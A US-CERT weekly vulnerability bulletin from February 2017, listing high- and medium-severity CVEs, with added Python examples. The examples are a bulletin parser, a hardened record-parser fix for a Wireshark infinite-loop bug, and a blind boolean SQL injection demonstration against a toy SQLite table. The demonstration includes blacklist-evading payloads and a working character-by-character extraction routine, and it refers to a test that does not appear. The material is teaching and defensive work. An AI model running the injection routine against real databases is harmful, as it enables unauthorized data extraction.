SB17-051: Vulnerability Summary for the Week of February 13, 2017

Original release date: February 20, 2017

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division into high, medium, and low severities corresponds to the following scores:

  • High – Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 – 10.0

  • Medium – Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 – 6.9

  • Low – Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 – 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.
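The bulletin's own layout is worth being able to parse, because it is how many teams ingest these summaries into a triage queue: each entry is one line of vendor, product, description, published date, CVSS base score and CVE ID, followed by one source-type tag per line (CONFIRM, BID, MISC and so on). The following is an added example, not US-CERT tooling, that parses that layout from the plain-text bulletin, applies the severity buckets defined above, and flags entries whose score does not belong under the section heading they appear in. The sample input is three entries taken from this bulletin; the regular expression and the function names are the example's own.

```python
import re

# One entry per line in the flattened bulletin:
#   "<vendor> — <product> <description> <YYYY-MM-DD> <cvss> <CVE-ID>"
# followed by one source-type tag per line (CONFIRM, BID, MISC, ...). The regex is this
# example's own; the tag set is the one that appears in this bulletin.
ROW_RE = re.compile(
    r"^(?P<vendor>\S+) — (?P<product>\S+) (?P<description>.+?) "
    r"(?P<published>\d{4}-\d{2}-\d{2}) (?P<score>\d{1,2}\.\d) (?P<cve>CVE-\d{4}-\d{4,7})$"
)
SOURCE_TAGS = {"CONFIRM", "BID", "MISC", "MLIST", "SECTRACK", "FREEBSD", "FEDORA", "SUSE", "DEBIAN"}

# Constructed sample input: three entries taken from this bulletin (two High, one Medium).
SAMPLE = """\
adobe — campaign Adobe Campaign versions 16.4 Build 8724 and earlier have a code injection vulnerability. 2017-02-15 7.5 CVE-2017-2968
CONFIRM
CONFIRM
advantech — susiaccess An issue was discovered in Advantech SUSIAccess Server Version 3.0 and prior. The admin password is stored in the system and is encrypted with a static key hard-coded in the program. Attackers could reverse the admin account password for use. 2017-02-13 7.2 CVE-2016-9353
BID
MISC
adobe — campaign Adobe Campaign versions 16.4 Build 8724 and earlier have a cross-site scripting (XSS) vulnerability. 2017-02-15 4.3 CVE-2017-2969
CONFIRM
"""


def severity(score):
    """Bucket a CVSS base score the way the bulletin does (7.0-10.0 High, 4.0-6.9 Medium, else Low)."""
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    return "Low"


def parse_bulletin(text):
    """Return one dict per entry; source-tag lines are attached to the entry that precedes them."""
    rows = []
    for raw in text.splitlines():
        line = raw.strip()
        match = ROW_RE.match(line)
        if match:
            row = match.groupdict()
            row["score"] = float(row["score"])
            row["sources"] = []
            rows.append(row)
        elif line in SOURCE_TAGS and rows:
            rows[-1]["sources"].append(line)
    return rows


def group_by_severity(rows):
    """Map severity label -> list of CVE IDs, in bulletin order."""
    groups = {}
    for row in rows:
        groups.setdefault(severity(row["score"]), []).append(row["cve"])
    return groups


def misfiled(rows, section_label):
    """CVE IDs whose score does not belong under the given section heading."""
    return [row["cve"] for row in rows if severity(row["score"]) != section_label]


if __name__ == "__main__":
    parsed = parse_bulletin(SAMPLE)
    for label, cves in group_by_severity(parsed).items():
        print(label, cves)
    print("misfiled under High:", misfiled(parsed, "High"))
```

Run it against the text of a whole section (everything between a severity heading and the next one) and `misfiled` gives the entries worth a second look; the description is matched non-greedily so version strings such as "3.0" inside it are not mistaken for the score.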


High Vulnerabilities

Columns: Primary Vendor — Product; Description; Published; CVSS Score; Source & Patch Info (the source types for each entry are listed on the lines that follow it)
adobe — campaign Adobe Campaign versions 16.4 Build 8724 and earlier have a code injection vulnerability. 2017-02-15 7.5 CVE-2017-2968
CONFIRM
CONFIRM
adobe — digital_editions Adobe Digital Editions versions 4.5.3 and earlier have an exploitable heap overflow vulnerability. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2973
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable use after free vulnerability in a routine related to player shutdown. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2982
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable heap overflow vulnerability in the h264 decoder routine. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2984
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable use after free vulnerability in the ActionScript 3 BitmapData class. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2985
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable heap overflow vulnerability in the Flash Video (FLV) codec. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2986
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable integer overflow vulnerability related to Flash Broker COM. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2987
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable memory corruption vulnerability when performing garbage collection. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2988
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable memory corruption vulnerability in the h264 decompression routine. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2990
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable memory corruption vulnerability in the h264 codec (related to decompression). Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2991
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable heap overflow vulnerability when parsing an MP4 header. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2992
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable use after free vulnerability related to event handlers. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2993
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable memory corruption vulnerability in Primetime SDK. Successful exploitation could lead to arbitrary code execution. 2017-02-15 10.0 CVE-2017-2996
CONFIRM
advantech — susiaccess An issue was discovered in Advantech SUSIAccess Server Version 3.0 and prior. The admin password is stored on the system encrypted with a static key hard-coded in the program, so an attacker who obtains the stored value can recover the admin account password. 2017-02-13 7.2 CVE-2016-9353
BID
MISC
advantech — webaccess An issue was discovered in Advantech WebAccess Version 8.1. To be able to exploit the SQL injection vulnerability, an attacker must supply malformed input to the WebAccess software. Successful attack could result in administrative access to the application and its data files. 2017-02-13 7.5 CVE-2017-5154
BID
MISC
binom3 — universal_multifunctional_electric_power_quality_meter_firmware An issue was discovered in BINOM3 Universal Multifunctional Electric Power Quality Meter. Lack of authentication for remote service gives access to application set up and configuration. 2017-02-13 10.0 CVE-2017-5162
BID
MISC
binom3 — universal_multifunctional_electric_power_quality_meter_firmware An issue was discovered in BINOM3 Universal Multifunctional Electric Power Quality Meter. Users do not have any option to change their own passwords. 2017-02-13 7.5 CVE-2017-5167
BID
MISC
dotcms — dotcms An issue was discovered in dotCMS through 3.6.1. The findChildrenByFilter() function which is called by the web accessible path /categoriesServlet performs string interpolation and direct SQL query execution. SQL quote escaping and a keyword blacklist were implemented in a new class, SQLUtil (main/java/com/dotmarketing/common/util/SQLUtil.java), as part of the remediation of CVE-2016-8902; however, these can be overcome in the case of the q and inode parameters to the /categoriesServlet path. Overcoming these controls permits a number of blind boolean SQL injection vectors in either parameter. The /categoriesServlet web path can be accessed remotely and without authentication in a default dotCMS deployment. 2017-02-17 7.5 CVE-2017-5344
MISC
MISC
MISC
exponentcms — exponent_cms install/index.php in Exponent CMS 2.3.9 allows remote attackers to execute arbitrary commands via shell metacharacters in the sc array parameter. 2017-02-13 7.5 CVE-2016-7565
MLIST
CONFIRM
CONFIRM
freebsd — freebsd The Linux compatibility layer in the kernel in FreeBSD 9.3, 10.1, and 10.2 allows local users to read portions of kernel memory and potentially gain privilege via unspecified vectors, related to "handling of Linux futex robust lists." 2017-02-15 7.2 CVE-2016-1880
SECTRACK
FREEBSD
freebsd — freebsd The kernel in FreeBSD 9.3, 10.1, and 10.2 allows local users to cause a denial of service (crash) or potentially gain privilege via a crafted Linux compatibility layer setgroups system call. 2017-02-15 7.2 CVE-2016-1881
SECTRACK
FREEBSD
freebsd — freebsd The issetugid system call in the Linux compatibility layer in FreeBSD 9.3, 10.1, and 10.2 allows local users to gain privilege via unspecified vectors. 2017-02-15 7.2 CVE-2016-1883
SECTRACK
FREEBSD
freebsd — freebsd Integer overflow in the bhyve hypervisor in FreeBSD 10.1, 10.2, 10.3, and 11.0 when configured with a large amount of guest memory, allows local users to gain privilege via a crafted device descriptor. 2017-02-15 7.2 CVE-2016-1889
SECTRACK
FREEBSD
honeywell — xl_web_ii_controller An issue was discovered in Honeywell XL Web II controller XL1000C500 XLWebExe-2-01-00 and prior, and XLWeb 500 XLWebExe-1-02-08 and prior. An unauthenticated user can perform a directory traversal attack by accessing a specific URL. 2017-02-13 7.5 CVE-2017-5143
BID
MISC
ibm — integration_bus IBM Integration Bus 9.0 and 10.0 and WebSphere Message Broker SOAP flows are vulnerable to a denial of service caused by an XML External Entity Injection (XXE) error when processing XML data. A remote attacker could exploit this vulnerability to expose highly sensitive information or consume all available memory. IBM Reference #: 1997918. 2017-02-15 8.5 CVE-2016-9706
CONFIRM
ibm — vios IBM AIX 5.3, 6.1, 7.1, and 7.2 contains an unspecified vulnerability that would allow a locally authenticated user to obtain root level privileges. IBM APARs: IV88658, IV87981, IV88419, IV87640, IV88053. 2017-02-15 7.2 CVE-2016-6079
CONFIRM
BID
ibm — vios IBM AIX 6.1, 7.1, and 7.2 could allow a local user to gain root privileges using a specially crafted command within the bellmail client. IBM APARs: IV91006, IV91007, IV91008, IV91010, IV91011. 2017-02-15 7.2 CVE-2016-8972
CONFIRM
BID
lynxspring — jenesys_bas_bridge An issue was discovered in Lynxspring JENEsys BAS Bridge versions 1.1.8 and older. The application uses a hard-coded username with no password, allowing an attacker into the system without authentication. 2017-02-13 7.5 CVE-2016-8361
BID
MISC
moxa — dacenter An issue was discovered in Moxa DACenter Versions 1.4 and older. A specially crafted project file may cause the program to crash because of Uncontrolled Resource Consumption. 2017-02-13 7.1 CVE-2016-9354
BID
MISC
moxa — nport_5100_series_firmware An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6×50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. Administration passwords can be retried without authenticating. 2017-02-13 7.5 CVE-2016-9361
BID
MISC
moxa — nport_5100_series_firmware An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6×50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. Buffer overflow vulnerability may allow an unauthenticated attacker to remotely execute arbitrary code. 2017-02-13 7.5 CVE-2016-9363
BID
MISC
moxa — nport_5100_series_firmware An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6×50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. The amount of resources requested by a malicious actor is not restricted, leading to a denial-of-service caused by resource exhaustion. 2017-02-13 7.8 CVE-2016-9367
BID
MISC
moxa — nport_5100_series_firmware An issue was discovered in Moxa NPort 5110 versions prior to 2.6, NPort 5130/5150 Series versions prior to 3.6, NPort 5200 Series versions prior to 2.8, NPort 5400 Series versions prior to 3.11, NPort 5600 Series versions prior to 3.7, NPort 5100A Series & NPort P5150A versions prior to 1.3, NPort 5200A Series versions prior to 1.3, NPort 5150AI-M12 Series versions prior to 1.2, NPort 5250AI-M12 Series versions prior to 1.2, NPort 5450AI-M12 Series versions prior to 1.2, NPort 5600-8-DT Series versions prior to 2.4, NPort 5600-8-DTL Series versions prior to 2.4, NPort 6×50 Series versions prior to 1.13.11, NPort IA5450A versions prior to v1.4. Firmware can be updated over the network without authentication, which may allow remote code execution. 2017-02-13 10.0 CVE-2016-9369
BID
MISC
moxa — softcms An issue was discovered in Moxa SoftCMS versions prior to Version 1.6. The Moxa SoftCMS web server does not properly validate input. An attacker could supply unexpected values that crash the program, or cause excessive resource consumption that results in a denial-of-service condition. 2017-02-13 7.8 CVE-2016-9332
BID
MISC
nagios — nagios Nagios 4.2.4 and earlier allows local users to gain root privileges via a hard link attack on the Nagios init script file, related to CVE-2016-8641. 2017-02-15 7.2 CVE-2016-10089
MLIST
BID
schneider-electric — powerlogic_pm8ecc_firmware An issue was discovered in Schneider Electric PowerLogic PM8ECC device 2.651 and older. Undocumented hard-coded credentials allow access to the device. 2017-02-13 7.5 CVE-2016-5818
BID
MISC
videoinsight — web_client An issue was discovered in VideoInsight Web Client Version 6.3.5.11 and previous versions. A SQL Injection vulnerability has been identified, which may allow remote code execution. 2017-02-13 7.5 CVE-2017-5151
BID
MISC
vim — vim vim before patch 8.0.0322 does not properly validate values for tree length when handling a spell file, which may result in an integer overflow at a memory allocation site and a resultant buffer overflow. 2017-02-10 7.5 CVE-2017-5953
CONFIRM
CONFIRM
wireshark — wireshark In Wireshark 2.2.4 and earlier, a crafted or malformed STANAG 4607 capture file will cause an infinite loop and memory exhaustion. If the packet size field in a packet header is zero, the read offset never advances, so the dissector repeatedly attempts to read the same zero-length packet. This quickly exhausts all system memory. 2017-02-17 7.8 CVE-2017-6014
CONFIRM
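The Wireshark entry (CVE-2017-6014) describes a classic file-parser failure: a loop over length-prefixed records that advances by the declared length, so a record declaring length zero never moves the offset and the loop spins while allocating. The following is an added example and not Wireshark code; the record framing (a 4-byte big-endian length that includes its own header) is constructed for the demonstration and is not the STANAG 4607 layout. It shows the vulnerable pattern instrumented so the stuck offset is visible, next to a loop with the checks that rule it out: the declared length must be at least the header size, must stay inside the buffer, and total work is bounded.

```python
import struct

# Constructed record framing for the demonstration (NOT the STANAG 4607 layout): each
# record starts with a 4-byte big-endian "total length including this header" field.
HEADER = struct.Struct(">I")


def build_capture(payloads):
    """Assemble well-formed records; used only to construct sample input."""
    return b"".join(HEADER.pack(HEADER.size + len(p)) + p for p in payloads)


def naive_offsets(buf, steps):
    """The vulnerable pattern, instrumented.

    Advances by the declared length without checking it, so a zero length pins the loop
    to one offset and it never reaches the end of the buffer. The iteration cap `steps`
    exists only so this stays runnable; the returned offsets show the lack of progress.
    """
    off, seen = 0, []
    for _ in range(steps):
        if off + HEADER.size > len(buf):
            break
        (size,) = HEADER.unpack_from(buf, off)
        seen.append(off)
        off += size          # size == 0 -> same offset next time round
    return seen


def parse_records(buf, max_records=100_000):
    """Hardened loop: every iteration must advance by at least the header size, stay inside
    the buffer, and the total number of records is bounded."""
    off, records = 0, []
    while off < len(buf):
        if len(buf) - off < HEADER.size:
            raise ValueError(f"truncated header at offset {off}")
        (size,) = HEADER.unpack_from(buf, off)
        if size < HEADER.size:
            raise ValueError(
                f"record at offset {off} declares length {size}, smaller than its header; "
                "refusing to loop")
        if off + size > len(buf):
            raise ValueError(f"record at offset {off} declares length {size}, past end of buffer")
        records.append(buf[off + HEADER.size:off + size])
        off += size
        if len(records) > max_records:
            raise ValueError("too many records")
    return records


if __name__ == "__main__":
    good = build_capture([b"a", b"bb"])
    bad = build_capture([b"a"]) + b"\x00\x00\x00\x00" + b"junk"
    print(parse_records(good))
    print("naive loop offsets on bad input:", naive_offsets(bad, 5))
    try:
        parse_records(bad)
    except ValueError as exc:
        print("hardened parser:", exc)
```

The check that matters is `size < HEADER.size`: it rejects zero and any other value that would make the next offset equal to or earlier than the current one, which is the invariant the original dissector lacked. The record cap is a second line of defence against inputs that are well-formed but built to allocate unboundedly.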

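The dotCMS entry above (CVE-2017-5344) describes a remediation made of SQL quote escaping plus a keyword blacklist, and states that both were overcome for the q and inode parameters, leaving blind boolean injection. The following is an added, generic illustration in Python with SQLite; it is not dotCMS code, the table is not dotCMS's schema, and the blacklist is a stand-in rather than the real SQLUtil. It shows why quote escaping does nothing for a value interpolated unquoted into a numeric comparison, how a true/false oracle recovers a column value one character at a time using payloads that contain neither quotes nor blacklisted keywords, and the parameterized form that closes the hole.

```python
import re
import sqlite3


def make_db():
    """Constructed sample schema and rows (not dotCMS's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE category (inode INTEGER PRIMARY KEY, category_name TEXT, category_key TEXT)")
    conn.executemany("INSERT INTO category VALUES (?, ?, ?)",
                     [(1, "Root", "root"), (2, "Secret", "s3cr3t-key")])
    return conn


# Stand-in for an escape-plus-keyword-blacklist defence (generic, not dotCMS's SQLUtil).
BLACKLIST = re.compile(r"\b(select|union|insert|update|delete|drop|exec)\b", re.IGNORECASE)


def escape_and_filter(value):
    if BLACKLIST.search(value):
        raise ValueError("blocked by keyword blacklist")
    return value.replace("'", "''")


def find_children_vulnerable(conn, inode):
    # Quote escaping protects a quoted string literal. Here the value lands unquoted in a
    # numeric comparison, so a payload with no quotes and no blacklisted word goes through.
    sql = f"SELECT category_name FROM category WHERE inode = {escape_and_filter(inode)}"
    return [row[0] for row in conn.execute(sql)]


def find_children_safe(conn, inode):
    # Validate the type, then bind it; the value can never change the statement's structure.
    return [row[0] for row in conn.execute(
        "SELECT category_name FROM category WHERE inode = ?", (int(inode),))]


def blind_extract(conn, inode, column="category_key"):
    """Recover `column` for row `inode` using only a row/no-row oracle.

    Every payload is of the form "<inode> AND <expr> > <n>": no quotes, no SELECT/UNION,
    so the escape-and-blacklist layer passes it unchanged.
    """
    def oracle(condition):
        return bool(find_children_vulnerable(conn, f"{inode} AND {condition}"))

    def binary_search(expr, hi):
        lo = 0
        while lo < hi:                      # invariant: value in [lo, hi]
            mid = (lo + hi) // 2
            if oracle(f"{expr} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = binary_search(f"length({column})", 256)
    return "".join(
        chr(binary_search(f"unicode(substr({column},{pos},1))", 127))
        for pos in range(1, length + 1))


if __name__ == "__main__":
    conn = make_db()
    print("normal:", find_children_vulnerable(conn, "2"))
    print("true/false oracle:", find_children_vulnerable(conn, "2 AND 1=1"),
          find_children_vulnerable(conn, "2 AND 1=2"))
    print("extracted:", blind_extract(conn, 2))
    try:
        find_children_safe(conn, "2 AND 1=1")
    except ValueError as exc:
        print("parameterized version rejects the payload:", exc)
```

The blacklist is not useless (a UNION SELECT payload is still blocked, as the test below checks), but it is not a security boundary: the attacker only needs comparisons and built-in functions, which no reasonable blacklist can remove. Binding the value and validating its type leaves no such gap.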

Medium Vulnerabilities

Columns: Primary Vendor — Product; Description; Published; CVSS Score; Source & Patch Info (the source types for each entry are listed on the lines that follow it)
adcon_telemetry — a850_telemetry_gateway_base_station_firmware An issue was discovered in Adcon Telemetry A850 Telemetry Gateway Base Station. The Web Interface does not neutralize or incorrectly neutralizes user-controllable input before it is placed in the output; this could allow for cross-site scripting. 2017-02-13 4.3 CVE-2016-2274
BID
MISC
adobe — campaign Adobe Campaign versions 16.4 Build 8724 and earlier have a cross-site scripting (XSS) vulnerability. 2017-02-15 4.3 CVE-2017-2969
CONFIRM
adobe — digital_editions Adobe Digital Editions versions 4.5.3 and earlier have an exploitable memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution. 2017-02-15 5.0 CVE-2017-2974
CONFIRM
adobe — digital_editions Adobe Digital Editions versions 4.5.3 and earlier have an exploitable memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution. 2017-02-15 5.0 CVE-2017-2975
CONFIRM
adobe — digital_editions Adobe Digital Editions versions 4.5.3 and earlier have an exploitable memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution. 2017-02-15 5.0 CVE-2017-2976
CONFIRM
adobe — digital_editions Adobe Digital Editions versions 4.5.3 and earlier have an exploitable memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution. 2017-02-15 5.0 CVE-2017-2977
CONFIRM
adobe — digital_editions Adobe Digital Editions versions 4.5.3 and earlier have an exploitable memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution. 2017-02-15 5.0 CVE-2017-2978
CONFIRM
adobe — digital_editions Adobe Digital Editions versions 4.5.3 and earlier have an exploitable memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution. 2017-02-15 5.0 CVE-2017-2979
CONFIRM
adobe — digital_editions Adobe Digital Editions versions 4.5.3 and earlier have an exploitable memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution. 2017-02-15 5.0 CVE-2017-2980
CONFIRM
adobe — digital_editions Adobe Digital Editions versions 4.5.3 and earlier have an exploitable memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution. 2017-02-15 5.0 CVE-2017-2981
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable use after free vulnerability in Primetime SDK event dispatch. Successful exploitation could lead to arbitrary code execution. 2017-02-15 6.8 CVE-2017-2994
CONFIRM
adobe — flash_player Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable type confusion vulnerability related to the MessageChannel class. Successful exploitation could lead to arbitrary code execution. 2017-02-15 6.8 CVE-2017-2995
CONFIRM
advantech — susiaccess An issue was discovered in Advantech SUSIAccess Server Version 3.0 and prior. An attacker could traverse the file system and extract files, resulting in information disclosure. 2017-02-13 5.0 CVE-2016-9349
BID
MISC
advantech — susiaccess An issue was discovered in Advantech SUSIAccess Server Version 3.0 and prior. A directory traversal/file upload flaw allows an attacker to upload and unpack a zip file. 2017-02-13 6.0 CVE-2016-9351
BID
MISC
advantech — webaccess An issue was discovered in Advantech WebAccess Version 8.1. By accessing a specific uniform resource locator (URL) on the web server, a malicious user is able to access pages unrestricted (AUTHENTICATION BYPASS). 2017-02-13 6.4 CVE-2017-5152
BID
MISC
artifex — mupdf The pdf_to_num function in pdf-object.c in MuPDF before 1.10 allows remote attackers to cause a denial of service (use-after-free and application crash) via a crafted file. 2017-02-15 4.3 CVE-2016-8674
CONFIRM
MLIST
BID
MISC
CONFIRM
CONFIRM
CONFIRM
artifex — mupdf Heap-based buffer overflow in the fz_subsample_pixmap function in fitz/pixmap.c in MuPDF 1.10a allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a crafted image. 2017-02-15 4.3 CVE-2017-5896
CONFIRM
MLIST
MLIST
BID
CONFIRM
autotrace_project — autotrace Heap-based buffer overflow in the pstoedit_suffix_table_init function in output-pstoedit.c in AutoTrace 0.31.1 allows remote attackers to cause a denial of service (out-of-bounds write) via a crafted bmp image file. 2017-02-15 4.3 CVE-2016-7392
MLIST
MLIST
BID
MISC
CONFIRM
binom3 — universal_multifunctional_electric_power_quality_meter_firmware An issue was discovered in BINOM3 Universal Multifunctional Electric Power Quality Meter. Input sent from a malicious client is not properly verified by the server. An attacker can execute arbitrary script code in another user’s browser session (CROSS-SITE SCRIPTING). 2017-02-13 4.3 CVE-2017-5164
BID
MISC
binom3 — universal_multifunctional_electric_power_quality_meter_firmware An issue was discovered in BINOM3 Universal Multifunctional Electric Power Quality Meter. There is no CSRF Token generated per page and/or per (sensitive) function. Successful exploitation of this vulnerability can allow silent execution of unauthorized actions on the device such as configuration parameter changes, and saving modified configuration. 2017-02-13 6.8 CVE-2017-5165
BID
MISC
binom3 — universal_multifunctional_electric_power_quality_meter_firmware An issue was discovered in BINOM3 Universal Multifunctional Electric Power Quality Meter. An INFORMATION EXPOSURE flaw can be used to gain privileged access to the device. 2017-02-13 5.0 CVE-2017-5166
BID
MISC
bubblewrap_project — bubblewrap Bubblewrap before 0.1.3 sets the PR_SET_DUMPABLE flag, which might allow local users to gain privileges by attaching to the process, as demonstrated by sending commands to a PrivSep socket. 2017-02-13 6.9 CVE-2016-8659
MLIST
MLIST
BID
CONFIRM
fatek — automation_pm_designer An issue was discovered in Fatek Automation PM Designer V3 Version 2.1.2.2, and Automation FV Designer Version 1.2.8.0. Sending additional valid packets could allow the attacker to cause a crash or to execute arbitrary code, because of Improper Restriction of Operations within the Bounds of a Memory Buffer. 2017-02-13 6.8 CVE-2016-5796
BID
MISC
fatek — automation_pm_designer An issue was discovered in Fatek Automation PM Designer V3 Version 2.1.2.2, and Automation FV Designer Version 1.2.8.0. By sending additional valid packets, an attacker could trigger a stack-based buffer overflow and cause a crash. Also, a malicious attacker can trigger a remote buffer overflow on the Fatek Communication Server. 2017-02-13 5.0 CVE-2016-5798
BID
MISC
fedoraproject — fedora slock allows attackers to bypass the screen lock via vectors involving an invalid password hash, which triggers a NULL pointer dereference and crash. 2017-02-15 5.0 CVE-2016-6866
CONFIRM
MISC
MLIST
MLIST
BID
FEDORA
FEDORA
fedoraproject — fedora regex.c in GNU ed before 1.14.1 allows attackers to cause a denial of service (crash) via a malformed command, which triggers an invalid free. 2017-02-16 5.0 CVE-2017-5357
MLIST
MLIST
MLIST
MLIST
BID
FEDORA
MLIST
freebsd — freebsd The telnetd service in FreeBSD 9.3, 10.1, 10.2, 10.3, and 11.0 allows remote attackers to inject arguments to login and bypass authentication via vectors involving a "sequence of memory allocation failures." 2017-02-15 5.0 CVE-2016-1888
SECTRACK
FREEBSD
gnu — glibc Memory leak in the __res_vinit function in the IPv6 name server management code in libresolv in GNU C Library (aka glibc or libc6) before 2.24 allows remote attackers to cause a denial of service (memory consumption) by leveraging partial initialization of internal resolver data structures. 2017-02-16 5.0 CVE-2016-5417
MLIST
BID
CONFIRM
CONFIRM
MLIST
google — chrome Blink in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, incorrectly handled object owner relationships, which allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5006
BID
CONFIRM
CONFIRM
google — chrome Blink in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, incorrectly handled the sequence of events when closing a page, which allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5007
BID
CONFIRM
CONFIRM
google — chrome Blink in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, allowed attacker controlled JavaScript to be run during the invocation of a private script method, which allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5008
BID
CONFIRM
CONFIRM
google — chrome WebRTC in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, failed to perform proper bounds checking, which allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2017-02-17 6.8 CVE-2017-5009
BID
CONFIRM
CONFIRM
google — chrome Blink in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, resolved promises in an inappropriate context, which allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5010
BID
CONFIRM
CONFIRM
google — chrome Google Chrome prior to 56.0.2924.76 for Windows insufficiently sanitized DevTools URLs, which allowed a remote attacker who convinced a user to install a malicious extension to read filesystem contents via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5011
BID
CONFIRM
CONFIRM
google — chrome A heap buffer overflow in V8 in Google Chrome prior to 56.0.2924.76 for Linux, Windows and Mac, and 56.0.2924.87 for Android, allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2017-02-17 6.8 CVE-2017-5012
BID
CONFIRM
CONFIRM
google — chrome Google Chrome prior to 56.0.2924.76 for Linux incorrectly handled new tab page navigations in non-selected tabs, which allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. 2017-02-17 4.3 CVE-2017-5013
BID
CONFIRM
CONFIRM
